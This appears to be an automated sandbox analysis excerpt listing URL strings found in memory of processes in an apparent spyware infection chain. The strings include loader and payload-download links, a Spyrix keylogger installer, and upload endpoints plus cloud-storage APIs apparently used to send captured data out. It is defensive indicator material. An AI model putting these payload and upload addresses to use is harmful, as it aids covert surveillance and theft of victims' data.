Source: curl.exe, 0000000E.00000002.1613915870.0000000002D30000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.1613960897.0000000002D44000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.1614035419.0000000002D79000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1613409560.0000000002D40000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1613488405.0000000002D43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfk
Source: cmd.exe, 0000000A.00000003.1598991147.00000000007F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfk&A
Source: curl.exe, 0000000E.00000002.1613915870.0000000002D39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfk77
Source: cmd.exe, 0000000A.00000003.1614181304.00000000007F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfk8A
Source: curl.exe, 0000000E.00000002.1613960897.0000000002D44000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1613409560.0000000002D40000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1613488405.0000000002D43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkE=E3
Source: curl.exe, 0000000E.00000002.1613915870.0000000002D30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkU
Source: cmd.exe, 0000000A.00000003.1598991147.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.1613915870.0000000002D30000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.1613844777.0000000002B30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkWinsta0
Source: cmd.exe, 0000000A.00000003.1598991147.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.1613915870.0000000002D30000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.1613844777.0000000002B30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkcurl.exe
Source: spkl.exe, 00000038.00000002.2753080685.00000000075E0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2756912357.00000000077BD000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2726762987.0000000001811000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: qrl.exe, 00000047.00000000.2538418999.00000000006BA000.00000008.00000001.01000000.00000017.sdmp, qrl.exe, 00000049.00000002.2606859968.00000000006BA000.00000008.00000001.01000000.00000017.sdmp, qrl.exe, 0000004B.00000000.2579493629.00000000006BA000.00000008.00000001.01000000.00000017.sdmp, qrl.exe, 0000004E.00000002.2655442094.00000000006BA000.00000008.00000001.01000000.00000017.sdmp	String found in binary or memory: https://curl.haxx.se/P
Source: qrl.exe, 00000047.00000000.2538418999.00000000006BA000.00000008.00000001.01000000.00000017.sdmp, qrl.exe, 00000049.00000002.2606859968.00000000006BA000.00000008.00000001.01000000.00000017.sdmp, qrl.exe, 0000004B.00000000.2579493629.00000000006BA000.00000008.00000001.01000000.00000017.sdmp, qrl.exe, 0000004E.00000002.2655442094.00000000006BA000.00000008.00000001.01000000.00000017.sdmp	String found in binary or memory: https://curl.haxx.se/docs/copyright.htmlD
Source: qrl.exe, qrl.exe, 00000047.00000002.2582114803.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000049.00000002.2606650716.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004B.00000000.2579396035.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004E.00000000.2603252461.00000000005F2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: qrl.exe	String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html#
Source: qrl.exe, qrl.exe, 00000047.00000002.2582114803.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 00000049.00000002.2606650716.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004B.00000000.2579396035.00000000005F2000.00000002.00000001.01000000.00000017.sdmp, qrl.exe, 0000004E.00000000.2603252461.00000000005F2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: https://curl.haxx.se/docs/sslcerts.html
Source: qrl.exe	String found in binary or memory: https://curl.haxx.se/docs/sslcerts.htmlcurl
Source: qrl.exe, 0000004E.00000000.2603252461.00000000005F2000.00000002.00000001.01000000.00000017.sdmp	String found in binary or memory: https://curl.haxx.se/libcurl/c/curl_easy_setopt.html
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://dashboard.actualkeylogger.com
Source: spkl.exe	String found in binary or memory: https://dashboard.actualkeylogger.com/account/login-from-program
Source: spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://dashboard.actualkeylogger.com/account/login-from-programspsMapspsJSON
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://dashboard.clevercontrol.com/account/user-hash-gen
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://dashboard.spyrix.com
Source: spkl.exe, 00000038.00000002.2742570837.000000000455D000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2742570837.00000000044E6000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2755859416.0000000007720000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/
Source: spkl.exe, 00000038.00000002.2746632236.000000000652A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/.spyrix.com/qqS
Source: spkl.exe, 00000038.00000002.2746632236.000000000652A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/6s
Source: spkl.exe, 00000038.00000002.2750231481.0000000006A70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/;ce
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://dashboard.spyrix.com/account/login-from-program
Source: [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/account/login-from-program?email=
Source: spkl.exe, 00000038.00000002.2742570837.00000000044E6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://dashboard.spyrix.com/ix.com/
Source: [space]= .exe, 00000007.00000002.1804766822.0000000002FA4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com
Source: curl.exe, 00000006.00000002.1549010969.000001CE89170000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000002.1549010969.000001CE89178000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000002.1549010969.000001CE89188000.00000004.00000020.00020000.00000000.sdmp, D0WmCTD2qO.bat	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404
Source: curl.exe, 00000006.00000002.1549010969.000001CE89170000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404Winsta0
Source: curl.exe, 00000006.00000002.1549010969.000001CE89170000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404curl.exe
Source: [space]= .exe, 00000007.00000002.1804766822.0000000002F7E000.00000004.00000800.00020000.00000000.sdmp, [space]= .exe.6.dr	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/
Source: [space]= .exe, 00000007.00000002.1804766822.0000000002F7E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/s6
Source: svchost.exe, 00000008.00000003.1559425141.00000274054E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000008.00000003.1559425141.0000027405470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
Source: [space]= .exe.6.dr	String found in binary or memory: https://securcdn.com/loader/link.php?prg_id=sfkupowershell.exe
Source: [space]= .exe, 00000013.00000003.1870585486.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, [space]= .exe, 00000013.00000003.2474200016.000000000205E000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003200000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2455460766.0000000003280000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2455460766.0000000003307000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.app/manual/kaspersky-loader/step1
Source: [space]= .exe, 00000013.00000003.1870585486.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, [space]= .exe, 00000013.00000003.2474200016.000000000205E000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003200000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2455460766.0000000003280000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2455460766.0000000003307000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.app/manual/kaspersky-loader/step18
Source: [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.app/manual/kaspersky-loader/step2
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2750231481.0000000006AE8000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://spyrix.net/Uwas771wvshs7916gjqg62417/core.php
Source: spkl.exe, 00000038.00000003.2605309079.00000000001E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/das
Source: [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/av
Source: spkl.exe, 00000038.00000002.2753080685.00000000075E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/p
Source: qrl.exe, qrl.exe, 00000049.00000002.2608232514.0000000001B8D000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000049.00000003.2604925511.0000000001B8B000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000049.00000002.2607715757.0000000001690000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000049.00000002.2607961539.0000000001B80000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004B.00000003.2614091454.00000000018DB000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004B.00000002.2616089382.00000000018D0000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004B.00000002.2615599074.00000000014A0000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004B.00000002.2616238123.00000000018DD000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004E.00000002.2658657384.00000000011D0000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004E.00000002.2658435418.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004E.00000003.2646135964.00000000011DB000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004E.00000002.2658904799.00000000011DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actions
Source: qrl.exe, 0000004B.00000002.2616089382.00000000018D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actions.e
Source: qrl.exe, 00000047.00000002.2583125482.00000000010F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actions//swtb-
Source: qrl.exe, 00000047.00000002.2582806090.0000000000C50000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000047.00000002.2583023321.0000000000DB0000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000049.00000002.2607715757.0000000001690000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000049.00000002.2607477587.00000000014C0000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004B.00000002.2615286703.00000000012D0000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004B.00000002.2615599074.00000000014A0000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004E.00000002.2658435418.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004E.00000002.2658177184.0000000000C80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsC:
Source: qrl.exe, 0000004E.00000002.2658435418.0000000000E10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsG
Source: qrl.exe, 0000004B.00000002.2616089382.00000000018D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsOMEPATH-
Source: qrl.exe, 0000004E.00000002.2658657384.00000000011D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionseDrive
Source: spkl.exe, 00000038.00000002.2726762987.0000000001811000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsin
Source: qrl.exe, 00000049.00000002.2607961539.0000000001B80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsive#
Source: qrl.exe, 00000047.00000002.2583202617.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000047.00000003.2578411599.00000000010FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsll
Source: qrl.exe, 00000047.00000002.2583125482.00000000010F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsta=C:
Source: qrl.exe, 00000049.00000002.2607961539.0000000001B80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsubertl
Source: qrl.exe, 0000004E.00000002.2658657384.00000000011D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsubertlS
Source: qrl.exe, 0000004B.00000003.2614091454.00000000018DB000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004B.00000002.2616238123.00000000018DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsuu
Source: qrl.exe, 00000049.00000002.2608232514.0000000001B8D000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000049.00000003.2604925511.0000000001B8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsuu7
Source: qrl.exe, 0000004E.00000003.2646135964.00000000011DB000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 0000004E.00000002.2658904799.00000000011DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/dashboard/prg-actionsuuV
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://spyrix.net/dashboard/proxy/upload
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://spyrix.net/rand.zip
Source: spkl.exe, spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://spyrix.net/usr/monitor/
Source: [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/usr/monitor/access.txt
Source: [space]= .tmp, 00000016.00000003.2462875945.00000000022B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/usr/monitor/iorder.php?comp_id=
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://spyrix.net/usr/monitor/iupload.php
Source: spkl.exe, 00000038.00000002.2742570837.000000000457B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spyrix.net/usr/monitor/iupload.phpy
Source: timeout.exe, 0000003D.00000002.2624195057.0000000003488000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.Z
Source: [space]= .tmp, 00000016.00000002.2471948542.0000000006885000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyO/
Source: spkl.exe, 00000038.00000002.2726418979.0000000001750000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/
Source: tasklist.exe, 00000057.00000002.2660761706.000000000324F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/C
Source: spmm.exe, 0000004D.00000002.2677681526.0000000002200000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download
Source: WMIC.exe, 0000001E.00000002.1940760617.000000000094C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.e5
Source: WMIC.exe, 0000001E.00000003.1940506007.0000000000975000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000021.00000002.1944743593.000001F03FF67000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000021.00000002.1944788946.000001F0401D0000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000002F.00000002.2166160354.0000022729BA3000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000002F.00000002.2166110001.0000022729B80000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000002F.00000002.2166160354.0000022729B9A000.00000004.00000020.00020000.00000000.sdmp, regedit.exe, 00000035.00000002.2402235208.0000000003268000.00000004.00000020.00020000.00000000.sdmp, regedit.exe, 00000035.00000002.2402349929.00000000034D0000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000036.00000002.2410129967.0000000003270000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2726418979.0000000001750000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2726762987.000000000179E000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2731323017.0000000003410000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2726762987.000000000176E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000039.00000002.2421738724.0000000003050000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000039.00000002.2420789675.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, chcp.com, 0000003C.00000002.2422081708.0000000003110000.00000004.00000020.00020000.00000000.sdmp, timeout.exe, 0000003D.00000002.2624195057.0000000003488000.00000004.00000020.00020000.00000000.sdmp, timeout.exe, 0000003D.00000002.2624261203.0000000004E60000.00000004.00000020.00020000.00000000.sdmp, timeout.exe, 00000040.00000002.2513844325.00000000032A8000.00000004.00000020.00020000.00000000.sdmp, timeout.exe, 00000040.00000002.2514115378.0000000004D50000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000041.00000002.2463413036.0000000002D10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
Source: reg.exe, 0000002F.00000002.2166160354.0000022729B9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe&bd
Source: curl.exe, 00000011.00000002.1867688496.0000000002AF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe&s
Source: wscript.exe, 00000039.00000002.2420789675.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeG
Source: curl.exe, 00000011.00000002.1867688496.0000000002AF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeJs5
Source: tasklist.exe, 00000059.00000002.2667523224.0000000000450000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000059.00000002.2667760128.0000000000570000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDATA=C:
Source: WMIC.exe, 0000001E.00000003.1940599499.0000000000975000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000001E.00000002.1941048881.0000000000975000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000001E.00000003.1940506007.0000000000975000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeN
Source: cmd.exe, 0000000A.00000003.1867990577.0000000000804000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000002.1867584387.0000000002980000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000002.1867688496.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeWinsta0
Source: curl.exe, 00000011.00000002.1867688496.0000000002AF9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeXsC
Source: WMIC.exe, 0000001E.00000002.1940760617.0000000000940000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exec
Source: cmd.exe, 0000000A.00000003.1867990577.0000000000804000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000002.1867584387.0000000002980000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000002.1867688496.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.execurl.exe
Source: WMIC.exe, 0000001A.00000002.1922338845.0000000002D00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exev
Source: regedit.exe, 00000035.00000002.2402349929.00000000034D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/f
Source: regedit.exe, 00000035.00000002.2402349929.00000000034D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://swtb-download.spyrix-sfk.com/ff
Source: [space]= .tmp, 00000016.00000003.2457362812.0000000003408000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003321000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.certum.pl/CPS0
Source: [space]= .tmp, 00000016.00000003.2457362812.0000000003408000.00000004.00001000.00020000.00000000.sdmp, [space]= .tmp, 00000016.00000003.1875219157.0000000003321000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.certum.pl/repository.0
Source: spkl.exe	String found in binary or memory: https://www.dropbox.com/1/oauth/authorize?oauth_token=
Source: spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.dropbox.com/1/oauth/authorize?oauth_token=open
Source: curl.exe, 00000011.00000003.1867162261.0000000002B0C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000003.1867203455.0000000002B38000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000003.1859136273.0000000002B35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.googleapis.com/auth/drive
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.googleapis.com/auth/userinfo.email
Source: spkl.exe	String found in binary or memory: https://www.googleapis.com/auth/userinfo.prof
Source: spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.googleapis.com/auth/userinfo.profile
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.googleapis.com/drive/v2/about
Source: spkl.exe	String found in binary or memory: https://www.googleapis.com/drive/v2/files
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.googleapis.com/drive/v2/files/
Source: spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.googleapis.com/drive/v2/files/U
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.googleapis.com/drive/v2/files?maxResults=1000&q=
Source: spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.googleapis.com/drive/v2/filesU
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: spkl.exe, spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.googleapis.com/upload/drive/v2/files/
Source: spkl.exe	String found in binary or memory: https://www.googleapis.com/upload/drive/v2/files?uploadType=resumable
Source: spkl.exe, 00000038.00000003.2416007307.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000038.00000002.2673755823.0000000000401000.00000040.00000001.01000000.00000014.sdmp	String found in binary or memory: https://www.googleapis.com/upload/drive/v2/files?uploadType=resumableSV
